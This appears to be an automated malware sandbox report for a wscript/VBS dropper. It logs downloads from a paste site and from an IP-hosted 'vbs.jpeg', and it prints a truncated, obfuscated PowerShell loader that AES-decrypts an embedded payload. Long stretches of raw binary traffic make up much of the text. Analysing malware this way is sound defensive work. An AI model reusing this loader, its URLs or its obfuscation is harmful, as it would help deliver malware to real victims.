Data received	¸56½ßmÿæÉtH÷ÈOtþ¸ÔAlFæ O°8ÇÍÇ!5ðÿÕV¬B´.TñÎßïF!%ÔeuCl°0ñtÁ"þcìp:dfÕDQÁ~¸Üª¯¢·wù`´F$×Fñ ªùàj2T´¬Y¸ÝxÉ)È1 Üádr²µ^ß®%÷)M ïe!¢$¸Éã¾ )fq¹MÀÉ¬æ]À)k±Üó$è°Hê³éÕ4^ëãu÷ùà¾äáÕ1¨Ð¶\Û[]ätÓ¢p8>é/wÁÏá¥J?©º_ßYiBÑíì<Û;zq}o9<<©>c ï]p¿sÓ¬ûCR¿ÿÍÓ,3réÝÚI©¥,ù`eÏ¦¯¡½=qZ±á~£¿uÚîFà='ÓÓ/á7×3Ä)QZ¹®ã¶Ö0r6ùâû"Ói¡ÕóÍ+ÄVgxØ_&/Îæ`bä÷¼j+ÜéjÆãGéîµí§Ó¿BÌ)ÀAß{XuR©»åòiP^7ûç?¹yAJî%{bRÆèÛX^øÉ¬îÜ(Öiè5zX¼:PAGæØu9WkW\;²}Ë`1}ÃåXÒkI!+êR:ØN£ï '1ÓNñoX¨îÏ¯3²¨âX.Iøº!bA W¾I¥}^ DÉ?M¨¯×Â×ÃI,M+-°!@?ÍYS¥@£oíOëéuPO§X¤DËÃ^Ýð<ëFÑÇ!¥x5ß-ïFÀ0j«í~#¡mB,DªQec¾N¢¤@GQß§¶Ñ<HI¢jû,º¤%O¾Jú¡´U÷ä}26îÆçlµ^1_«-·¤ºsÜ¢'h x$gû8\|¿Ó£F7jqÔzN{ó$K4íR{àgË½Ó´ì2}A¼4º]A¨>¥ü\à´.Ý²8nÀàaÆ}¨Ö_-å#·JxÉGÞ¡ò8ûÍín¬LÅwFª¤{íSý3?]2GârÌ¬Vx^ïÙNjbò>é°¸1#þ_íoHáB;(,¿ÅñuÅS=ùmb1í@«I Ó´C"°b9ä`!¦ÕjµSÅ7mÍü³IÐ$!lÕñdWª¥G·ÈA$tÀ01<JYb bzKÚÃ®kÇ¸²rïCÂÐ`O'±ÉKDícAýpQ!Ri¯Úñ9ö²ÅP¾ØX©»1÷öÀÌ¡fÝæ,ôÑ/ .¤°ãé:<LÍÏÃ)XZÙ>°Ü¯BG8á77¬nød,êPZârC ÖÊæñâV YB#ßx´é¦Û°ÃG¢VR0 ÖûdwM¼ÈÜ:m#Y·×Fk#ÓéVWX¨pÚM X¢óÄ6ê%F¿OHsfþYÐ2meäd22ÌAsð¼º[ aÐÖú}:9>Rô8Ük!C»¨éRCß,2Pmf,zü0/¦%¤4;XÈ"ÑôRËÀ¬ÔDVEòØFÓñøæc§Ô7<T{à]±½XqðÃOº%C7=1IcÝ8rMm¾1È »ÒG$ö²ÂÃÑ>(© úÃê%fØÈã £B »éP¹õ2V!C]ão12SÓÕ)hITlÒÄ¬þ·R½°º<jÅ`Jõ0:d4z1÷4&Ò¹ï®L\àµ:?»>øNÕºÛíDucpÒ}ÎR¶A`lõÀ@\ÉÃím£sL^]CÓ°ÂêÀ ¼ç`ê®Ò}ò$h¢ ©´ß_W8»±: µÁÀp®å$Ù5dZ[5ÛºçA³_1f×Hò)3Yä8ËrD¨ãFòÏâííD«&¨R¦ö]õ´D¦@²hÓ$²ÔugPàÀXÖÕN®A=hôÀ·Y¶b¿,²&èC¸ÄÃ¸iH¾¸ûH°0I´0èH;SÈË¢@\|2Ô%½°Ú½b©^s5Q<ÄHÁöæ°/¯¦PãÒzÄ¡î{Õ:tÅïæv¢6H¡ôÛ°Àb-dW3»#pÌo¹¼í;B§GRA;NI,´]ö¬'"Â¶·np{YPm&ÇPqØÆê¼Vh]DD8+gßHåHÌ9£ø³¤û·á»·¾ &)Y[p= àtM¹JÑ}ãÓê xUéUdà ÑÌÓ;ï¿p8Íh¾ÏkSÿ²\V5pîz7¶£Â 6æz,ÈQ=ùø¸ðý:Äæè/{tùãz] eWÒÈª(¨èOø½ó\|Ý"ßë"¤uü]0<ïøÍc5@¶ÝÅaOT, >ª¬öi<Ö,ÒéwªµÞ®.x5ß<ÌúY¼³b KK:z×¯=(ïÜ+uÐÎG ¾:_þl²h§SLÐU_3§þ¬ÃÖXc×º9l±0y¯=?õaVQOv©ÓÿVôóòoßò¥ê¾©þG iep´;OBfAüÎ\`tÉò $Kå÷ÿÕÚyV ÌÑUU'¯°?ëb¥µÉÃ¬k´kÏ8ðÑÊÒQM´ÇÞÿVTè¥fUiÀ³ÿÏ§üß ("¬e6õoÚ±Á¥<ÿùtéÓüYË£ò$ÓÛ÷éÿ«^òÌê;cº_:ØYG¥zü"ºNÃgÖ´dQ@.âEmÜ~¥:y`HG§ ,6¨< ÿkã×¹!âY ßÆÔYT[¾'¯Èâ´J@¼ÐÕ¬ÈÑÕv®ù3rÄ®Éä~Câ°ÓHtô{yéÿ«2)¹&¶4î%Å»ÈçD×÷Iw¾OÿoOýY ¤cÐ¾Ó#~°Yõ #C$áMÍ+ÐXÀ³þ FDZ;Y¦UP»´ÌlØVïÓù{b §Hw£B<Üª¤,2I"©%¡ .ê'O£sê¼¥óD.(iò õ\Ý33\g`X±âÙÏ÷¯s»6!$ªG<s_,x£É'¾éR3)çåJ,æçéaÔE(#!6û HuR¡iHoÃuWùÝ#ÚÀ·,:æäÞ2´°´]ÅgI8Dl,àUåxÕØm¡öÕß ¸Äâö³0Ú·D^M¦o%¶Ú'su ¡ê±³$ãpjTUÎI#"Þª_8¾WjØoØ7pÐ(AÕgfnÁë¬ÚÅõ¤4Ò7`;#;È7{_ñe4 Hxº¬N¦P9e®k Åªv½z¢äPrQâØR²Fÿs´`â8ìÚÛá=F2¥^¿YÐ?¦1¢Äw©ÜzfqÞ]Ooçª¤û^Üò^ï$/¥PG¾Ï"À82íÆàxÁ¨v,àsùa ÇpU?Ïë 1^çä)æki[ØprÄ³MàG¦bXØ¢Tà^IÝl°SúeâÔ*FQ¯ÍÏå3!R¥ékõÊ9gåGPß½$?L$@;ÝÖãðÀ# ×Ô+Õé¡¹<²9Üzb$"Ñü6záIH'«QCW·ý¿\j (ff³ÍJ¾qcøUõÈDj#m7B}° ç »OEíA°ìÇãïP(¢õã¾SRQ=eÆë½¸3¥µUì}±{e¡ÆL4?A¿;($±¯hé'U,Òø¯2ã£rcQ{¬Ñ&À«ÉÖ¼Æ Ù}ðO0Y-wCíÞh.ÜQfSð¶£F² TiÊ°N@÷¼¦txÕ!÷r>827¬nÚ¤þ¸èªZ[ãçni å6'}±Ík£;õþ¢àib 4<mßc+Úm üÎîÅ´»Pµn°®/Ud¾wnØY ;HÚ«®.X¨ä\|?LP«!)¹º
Data received	W§Ý ?È`5ÜÖ ÖãðÎ·àðöÉvv!5Üû8Îw9ÜçsÜçsÎw82Høs¹Àîrr9Îçs³C;8`[iË"¤ô£YPÜóÓ,W °.ók8e¨ÅØ°\|rBþYÂòà`p\®B®Q1¢cD2ü«Ç[VÇ~øÄh»ãßpQÇqX´i»Òüë 7L¬;ZL~(I#¡'¥à×§¨ÍX¥Àéã=jiÝE`Ç×5ôè¥:óAµÚíeÚÃ E? bÐ¥ô4 Ni«çý³;2ÇhK>×§Zaý³øV?÷0>S¦Ìl"$±p@øuþcOÆ1¤ iuwÜ¨;Àöf ñ4TÙI7`î=sÓóf¸u=V\|é³Ñ´Z×ÑÌÑ·£/pF¢è<a¡ÜÉg±ä~¶3=T»ØÜæoÆ´° 5Fù¨$àbjãëäEü6"/<ç-C'úï^Cø¤r/ù.y¯öy>Ì`%öZ»øþÀºaªtyÚÝAÏÉ~/âp9ìãùçê¿OàÚw å¢r¹s83vjGÃ?;þÖôÆ/ýÛ>ûdZñdù`\|Â¦ñ^Ùïñþ,ÔÓ Ë´ô"°6\|9kA±FÈÿãcð 8Ø}[O±³üñ D Â~X?ü°'ÕìÈãüCúùã²°ò-·W^£¦m¿LóÞ;ø ÿú`dº« Ëvý û)¨ÿ§?ÈgÁÃíkìzûÇìíû3(å'ôêr¼Øý33PV_Ëþ¹¡7 õÌÉìßY®úæ>©£6hßÈÿêÍ]Hà3/XQHànëôïª/Q£Lykÿ6cj$ÓÙðýY¯ªD¤©7ñ¹ý3SÁ7ù`Q4~<Ê·a_âÌù5!b[~7ñcâtð¶Ê Y¥æó6UOº!C¼^}®ÿLôÝÐöþÿ«,ú]¤kôß öþ,$¢&3Q,zw±Û©]32 ¦· DØêzÀ]õfke<tô7øñC,tìÑqÀ¢ßú±]2M"¿áí³gùbuÀhjcEÚt±²³AÜ:_Çã-^LQ96þÄv>Üa$òZXÅ"©Vm»·w¦½°2ÒÆ»T©Aðäý0.Z §óCÍå&T·}æ ;räÇºà§Â6&=Çm_Kãyc0"±=!Toix£X y1Þb±ÇñéËÚ´¦ @ÝGÿ1&&Dm{PI6×Ôÿ»ùåHygÖ¤'¼Åß¸^&ÀtÚ¹`e$ylc¥P¡í³vÑÅ¥:&ñq$J«Ê+sÅ¨áO$ÖNôZÆiSG mI:nvÑæÇûr àÒ´ÚBÆÌæ!çT½Ãù²É$»HøRÓÇP?ÂsB?ðöÐ»68U üAùâ®Ý/1qÊ°<Suøó:<îð5e¥Vhâ¦Â~¼cPø¹Øãf,WÊ_]gQ,uß,;Ê$³òI>Àsêü?W£DÚgÑÂ'al5}Û:ÉâOábÓtÑ)B;HgÒy6>â:Øù1)fûÁX°-}ÅÑã¡öÆØ:3©Y¤(hR)»Y;¯;à.ë¤2BÒIVw<q¨Bèå4³Cá¡«¤)bó!fî`àÒû_=3pxgF«ä¨Àº¤î¢l«ÜäMá>+ÈædåëL£ßÉÀËÒj\|'W:«Ç§bdP À£q&°¢ÅñÎh6§ÃÒ¾ýÒ!x}ÝGV,«>ßfÃu<zý4pÒ32©Ülw/zºÙèÔûxKé[¦]1äîe%mÁ«ùàÅ¦JÚôºbáØ+aKOb9ëðÅõSx{j£RClY%°Ûo§â?:¬wRÚM_¢£9¬µü>9©ÔGItúA¨ÉÂ¼ÍLGuõ#Y¦ÔkA¦ CFQDM)£Åõ®¹dÃ¤=D:bPÛT:C quÀüÉÌø\|F0é!ÓyLþñÝÄVÏW@2ÑéQ6E&çS/ ´¶5\|ò0Õ6j!ÔË¦bdfA±Ibµt:ßÔø´Z9 NÑ1(-`×Bp´Éf0-Äw9eE}.LÞV ñ±4knãp£êéÁþx-,å¢mrRÈ´ÕñR}Æ`ê[MrF±÷ýsQ+HâX9¡ ìSñ"ÍÂÔj´È%y;Í~XFQí7?¸ÉëÁ¹ ÛAªÄ@ã£JJ`ÞâñÅ¥dÕIgñïa£h4EIþ(@¼$êO!XãR¯jÛ8È$P/wÓ9}3 ÖÅH¡Üàe£ÍxØùq ¡kmöÌþÆi£²¬JÅH+Ð×Å7°¯ÉY%u®x±G§Ã,<Åj×6»Äµi$pÀ×!I¾ô{Ú9ÒG'o"Y£WÜ(ñ×¾1 Y!¶4»pÃ¨£ÔÀÒêfuZ(Uûà ¾^ù®G×ZLÂû-<HÁJ°ÆCz;Ûû¡CCWªY´ã` «VáÇcë¼9`ãsÈÌ»ñ¸5\|k:ÇhK#eGÚ° 4å7,näV<uøõËêÔ LpBm²«³Î/>jHm@#qº'L.¥FxÃ2ô÷#a+6Ðúqg°±"JÜnùÂ[L,UQÝ¨)nzàtÌK5ûå¹T{°ÆµH§XÑy dûñÄ$VÚÄLk+± à ãQöaüñP/°É'áDÁ%W"À`N³ïf pN pZ5SÕ{ä¾©+}F¤V?ÅÎJÑ²zü3[EâRb©ËfÒ¢ÅAßqÅ·CÒêÌI´m\|].¢yR6¹ 1Ò/?øo ©WQ$t¥¿J©Ü=ù<üÖUXÅÀ3MóÅWKïø¦¥¤öº£a®>=ð}H$T Ýrª?úÍ©ÚXje;OZ_ý9æõàxÙwÖ×Ó¶Æ¦ûÄîíT¡MÕð}¿#¨Ð!wiØª³íÐ\|³6h¹ZÜ 4ºçpøªÀXÇj¸,O+FÇÇÛ(Ê `OrÅ\0) qêï!ô@äÓÃLÊcÇ=ºâùÂi9C,Ú6×(¥HFxm§þXeò\¹Pdæ¬ñÏÃBCY¢z £ûåJ¶Má¯×uîVd%êÈ°GóËË©VGqEEûsÆÑ&kÜ/èo{¹¹;{ä´nY¬·ê6$]/ñÛÝÛÚÏm£§çQ ÔïÓAÏëÛAâ®£
Data received	³ðTmD7ìÚIÕ#Áís×5ì üûç~×xtþÞÐÇÅuèÞUâ<Y¾Aè,döqªt@]\|N,Íkñ´ò0ýéàÔéuZyÁX±"(ÌÚmH!ð®ÝÜàóå7JÖï}×Yõ¯Ù6\|TBËâóG$`!4lTôíæ7ç%ÔDÐÌÑÚl÷çßÌc¦ãg`$2~øãººy¼ÑÏû²·$¹³·t;ãø¤êõ1ÄôËm×ØGÓF»¬oÌÉ"ub¤¼ô;8óá¶'hQ"××m~¸ÒEçB \ pÉnWÈÚaê«Ì Áu\fx¹Ñ+DtåÁk-¼;WL a¤×¦¦)$Bë.C/ªk.õþÙÞñÉ¨m@ 8ÚbE ¸ðhl_<åcñ·MSÉ&BÚð¶;kÔvííøq±ãBviG+ø½È6}=G#!¦ò\|CLÐ7mªA¶"Pzür$}@ñ(Ð»4«,#p Jí;OõXñÖ PZ ?ãéÛ¥g>ºeµ!ñk`ÜíâñJÚÙcmK/ÌÙ#6·M«ÔÏ¨x[Oå£Q¸î¾9î=ýñÏ¾4¾RA+¶P¤\|)ËÄe·K¡TðX¿Óu)=f¡`û¸S±(Ú)¬YÏ^¸ßï+¨Õ»3yés@2© h>_¨ñu¯þÇç½8þØ7ñÍÿØÊcë[¹ç9ô2¿v¢Ó òµÛÄö,s]}²è¦ ®ÇT&bUYz55íÒÉ #ý¡HªéáÀ]÷¦t~52Ã!m:³3^¨ÐÀ¤9gÌ14Q2FÈ¯´ÊÜØÿ ®k¯8H4úôØÌ©ØíW½¤n(höã]0¿íy$IÐBË»wÐ=½ó$Õ¦ªY"m²¾íÍ@õëÍ\|0/£IõRêaDFÔU]ÊR ªx5düh4håTxè7¬¢@ÃnÓØócò¬SC ðÝKL"Vg©«z{öýpúÏÔ&8U¸ííWÅ`4ºøañ]YShVZ ç¿åïögÕ,%(Ø@ìO \|oÿ~À×xk´Út1(=L\¶ìÏ®q\uí×Üg:På b¥½=aG.I×iÔþD]Äðý¢(£m1bKä¸cãüUWß»mþ_ÀÙ@ASu¥TÜåL-³³´.Þ ÖcÁâÚÍK6R@1ER}Ø¿\Ó3ëY¶}ÛLdUÀjpxé·7íÂÄÑ¬hQ;EX&¿®yÝ<¦V ° Äÿ\õºß½O¡H ¡%ÌÛG½mí?×,£ÒÊÉæÙõ_b×kÂ&RºC°1 ªZÇ U\|1Vht£ÈÍ¹ê½½½ó>'ð uõ¼¨Ä«<¾¤öï»ëåRÂ ;D¬ÿÃoÑÏ<L°A;î ½ðúÔô1¤I#áÄáK-«x«ÑÀeÛº·2´MÙ_z2©¶3¡ 1vóÇE'OÃ"qª¶¼zv¨ÒocS¤S¨IÝä¥E]ªô§~ß\¢<êÛ£MlMÔÇÿ.Fª}Tqcw¢¥'ÿ ÀÎ×øv¢m0e´k°68&útÌ¿ðýD §÷!1>¡d© ák\|G_¤FµB $Ø jø¾G¶W«ÔjtÚyfrÙ ü°3 ÚÄÍÍÙ®?L´é¬2 °èAÆôº7×M±Q=[vÐ>´îÒx4ÿyD¡i$+ê¢ð2eRË.¦ã²úâAuíXèP-m¾}\d*Dq¡ÐvÀUXCî¢¸bÓ=l×ÔÖJFM ±>T´UlóÆE,l7sU_\°æûü°è6Í½NY¶ <°Ñ,EÑVb;c¥´ÁIãEÑÝî2¢RÑ

Poweshell is sending data to a remote host (1 event)

Data sent

GET /Upload/vbs.jpeg HTTP/1.1 Host: 198.46.176.133 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 24, 2024, 9:11 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

198.46.176.133

Wscript.exe initiated network communications indicative of a script based payload download (16 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW July 24, 2024, 9:11 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
InternetCrackUrlA July 24, 2024, 9:11 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
InternetReadFile July 24, 2024, 9:11 a.m.	buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function request_handle: 0x00cc000c	1	1
InternetCrackUrlW July 24, 2024, 9:11 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
InternetReadFile July 24, 2024, 9:11 a.m.	buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function request_handle: 0x00cc000c	1	1
InternetCrackUrlW July 24, 2024, 9:11 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:11 a.m.	connect_handle: 0x00cc0010 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369364
InternetReadFile July 24, 2024, 9:11 a.m.	buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function request_handle: 0x00cc0014	1	1
InternetCrackUrlW July 24, 2024, 9:11 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
InternetReadFile July 24, 2024, 9:11 a.m.	buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function request_handle: 0x00cc000c	1	1
InternetCrackUrlW July 24, 2024, 9:11 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
InternetReadFile July 24, 2024, 9:11 a.m.	buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function request_handle: 0x00cc000c	1	1

wscript.exe-based dropper (JScript, VBS) (5 events)

Network communications indicative of a potential document or script payload download was initiated by the processes wscript.exe, powershell.exe (28 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW July 24, 2024, 9:11 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
send July 24, 2024, 9:11 a.m.	buffer: ! socket: 1220 sent: 1	1	1
send July 24, 2024, 9:11 a.m.	buffer: plf F¤¿"Úë93cX66¹WÙJø5ñA(ôÓG¾/5 ÀÀÀ À 28+ÿ pastecode.dev socket: 1328 sent: 117	1	117
send July 24, 2024, 9:11 a.m.	buffer: ! socket: 1220 sent: 1	1	1
send July 24, 2024, 9:11 a.m.	buffer: ! socket: 1220 sent: 1	1	1
send July 24, 2024, 9:11 a.m.	buffer: FBA0X«û2p ùã{ÊöëJyÕ2+I"¶vV,UïEÂZ jÑu[8(e½Hë¶ëÛQ.£µ\0w×µîvìÜ\|ø]ÿÐmo/Âò§!Å^©,o0Òh}3°Î{ñ¯ socket: 1328 sent: 134	1	134
send July 24, 2024, 9:11 a.m.	buffer: ! socket: 1220 sent: 1	1	1
send July 24, 2024, 9:11 a.m.	buffer: p½»açUí(^a¦F´½¬ æ §ð&¶ÑÅL+óüû5ÚµyÜÐF ¨µÖ[Ý~ÿ:TéVª\h=ÞSmTª}¸,%lÏefÍ©ÏRcï =7¡)ØZ¢.ÅÂ6g+`½á ¾`äyð¡-ÊDãéÍ!Í:V@<ÅfCàÞ±fÜî¢T#a&óul{¶KæT¯Ói°T1íØ,ø-\|0²"N6Ü×Jñ2bëTîÂÝ0é×é<§´rµ«Gv2½+Ð§Äó0Ù£x-M\|p¡¨Û£9¹m³\Ç9úÛ°jÐeÛzóDRHFD¤§Þ¦´"{ÐÈ ¬È~ÀÞ£9ÏdÞ Ûy×ìüÃdÛ«'~ßÄ ª;ÑÜ»õ'v¶ü#ÙPºÑÁ\°òÀ[l¯³\|ØÝQî>CñØÿ{B socket: 1328 sent: 373	1	373
send July 24, 2024, 9:11 a.m.	buffer: ! socket: 1220 sent: 1	1	1
InternetCrackUrlA July 24, 2024, 9:11 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
InternetCrackUrlW July 24, 2024, 9:11 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
send July 24, 2024, 9:11 a.m.	buffer: À \ûM3¬7>.cÍðô\|ý d9·³u«Ó UºU]¤ù~kÍd5÷%êæêåÑQaZ,£¯¢~ÁáV]ªzî²Òê$Å13àE3%t§%âí'Á¿)é¯§?@ ½3}ÎvR>Nà&I]èÛoîäXWÅ BÎ©r¦âcPÝ×"íÙëçW~ó(doèQÕ¤Ê>áxâ«}dÈë²\nÔAèm5Cò·JÝÎKïìVÀ@ZQÏ#HÅjUqjæ³ÚÖÊ4Ú3~~5ò@6Îé0¨±Î%Òq<R±HõDÉlVç`%ÆÜØ$S(ÏTt;Iô=DÔÃ3c=}±ËÂoWªGñ(Ð¸ýä9i«ZÃë*ýÝÀ=#P?9§èp¬9ÿ¸ÀÖ¬ªùäÐ3nà¶Y¡XZÃª(2KÖé9'Ñ:gk#²ÎQ+a :Ó¸Í~]ëÆÙ@xóÙQ¬ìí©ÝµüGÇ!ARDß¤c[5ÀG£CÃ6¯´K socket: 1328 sent: 453	1	453
send July 24, 2024, 9:11 a.m.	buffer: ! socket: 1220 sent: 1	1	1
InternetCrackUrlW July 24, 2024, 9:11 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:11 a.m.	connect_handle: 0x00cc0010 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369364
send July 24, 2024, 9:11 a.m.	buffer: Àùupp¢dØÖî_fý\|¼æÏ¿ÒD³q~³Á¹¾?[X&þêæeähF«ÆoÞ¦fOx\üoÃÚm÷-ïk©´ÇëÂÚXÇßXa&C;1A$é¬¼Çäumã.è§µZâOqPÛÃ`ìmÅi%¸Å8tD bW²æ8zr¼\Cg¡Ìï)äOÐà3?yCFÚ¯Ü½ZÌuÖ×9"RL6Z¡7>£[¦zoé!1oP ÿ9S#%çH:d2»ÇÍyEíGN-ÿfØÊ2HùÁv!ÔJä$á«_Éë>+èZ×àõÞ°wÐDFsH¾iSE¥¾ÀC¢F±êÍ/ðs<sìÌß²C!iuLDR¿ý¢b¼÷j)ÚâK±26Ë¿£X+gïdB(máhOáªm¹ï09`#XQAd6ÆîWRSU²¶G&Ôt8êù_ñ¸óìõµ][>ákÚªàWòÆðaÆ²i;@@ÖDµî)ÑË¬£Ø¬1kPûrâ`9Úth×7V> socket: 1328 sent: 453	1	453
send July 24, 2024, 9:11 a.m.	buffer: ! socket: 1220 sent: 1	1	1
InternetCrackUrlW July 24, 2024, 9:11 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
send July 24, 2024, 9:11 a.m.	buffer: ÀÃÎ·Ó`x`;¤mÿë×Cóõìa:F2¤>÷Ìôþõ¦ÖPÙ æ§3Ù6QÔhëµp\|ß¤U@·x`ìIáH0Û& ¦ä+¢`¾(\ìG_ÕHV$5[æ6buîF Ñ3Ïc\|Ñ¬Sø§$¦4K~¿>b!«"FÜ¿D`ç}å¯Y_à\|¦ ¡NÉdÏ=WÌÆðÄ3oæäÒ$QJQ!þ^f¥`´²`Àßô\iC>ÜRQd.kà8PUïm»Ù·.úmÙª5 óý×1iªmÊIï§¿¸ÿÎeçTwt:!Ç Þ¾Rã9ãàå9ä$ñ8{L$;ù£4=¿2¬rÞë-c«¼b(¨t/!þ8þñou;M¼ñõ·+Âß+äïéí+- ï £Wäþ´m¹Ð²w}nÒ:wç¼ç@Ñæ85uÙß·H_Æ¹rLvR·6èç´<0^@áQbq¡Ô`úáÆ:Z°¯¤')ÍhÅ° >¢Æ socket: 1328 sent: 453	1	453
send July 24, 2024, 9:11 a.m.	buffer: ! socket: 1220 sent: 1	1	1
InternetCrackUrlW July 24, 2024, 9:11 a.m.	url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt flags: 0	1	1
HttpOpenRequestW July 24, 2024, 9:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /raw/6l7qjjrz/paste1.txt	1	13369356
send July 24, 2024, 9:11 a.m.	buffer: ÀpN}uÄî×â,çð£ #:R4%ÔOmCñÃY>î´;ÎÛþ5ÌÍ¾Ú·ó§]OuÞJ9¨(²~l¢õ1W<¢b úÆúr¿ÐE@ÕéFÅi°Hù§CTöäêëÍPN ZëÞb¼ò«ÒÝ2Å=EÝLJ®EMÇ¸U:¥z=ÄY^³w_=^Âûx§¡û´¥L\|Tji(tkÓoÛq:´¿°Äù^ÌsðÙj.üÙþw5ÊhÝG¥ÚöÉµ0¿Êo÷Ù¦ÿÜ{½¢È>ü&òªÞÑ6+ãäÉ<GsÞjÄ¨;o?+ \|½¿ =1£]a¾°àY<Äìè®¢k0¢>`Åq#\|¢q¡åpP;PÔP*ÞÕ_ïÌ¿2¢^F¸ÚÆSæý·+Cg¨àEÃdÕÐBÏùÈùY\|OìDõfV`íREe<xÂ¹ê9 ú>7 Åa{ÜPos%¼Îº"È"³¦ÖÔ£2G£´f:yÑ¤ôÉbu@aq socket: 1328 sent: 453	1	453
send July 24, 2024, 9:11 a.m.	buffer: ! socket: 1220 sent: 1	1	1
send July 24, 2024, 9:11 a.m.	buffer: GET /Upload/vbs.jpeg HTTP/1.1 Host: 198.46.176.133 Connection: Keep-Alive socket: 1312 sent: 79	1	79

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31288118537265901671092296545801CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI9qzw9rWNQXNXTkOMi91Vo37XNXwKsDkID6RFqNMIb+XDhn4Y5AbEg30f25b/EyGdGGjWsHDIIox1WuVuUdOUadjhme+5zvVV44oiyworfCO2lfsB1IQVwYt2W3SwF0Ux7M7imAEKs79W60z/0ynAsj8hj2vt/lnFQIiUMLXwxtg0ygxaA1q2xZSJwwSMDWyzIontKVe2xHt1HI77rYSt/VnOayqQ2yg7Mp48pY+uj2EZP74FtBnkcE9p92gZJxz+peJ+AKTzl7JeqJQuodXWFmK9sgGK4n13RybKFC+dVb8O8Krc/u05EdmP8zqWyMN4CIIIo6bc+uy3dadl98BZbD0z03uf3Oz6xO+gLfn9tOR1YKsukLXT2OScPDC2jP9f9Yqq+KSXQNHugPnILvW7k+DBL1ZjUxKLNlvCe0NOpwgh8+75a/DTYGBpNBdkSv6BeMFiZTOcAGGEAB5TlZIOZzRTBw8GIX57ryKhBD+OOgtPd2gLFQriTRl2LIoUqCZ1NdzqGQpGwwf4BXbnED2n7yIY2OKKYAovsduKNeTRlypT3jEkMxq1Z51SmOLPNtSqgYjTlhY1Pf+4wEgtf5RvJnRdkbil32H7SckZeqIf4a57uzHIqbcG+bjJT0/Q8jk0lXBCRIMGQd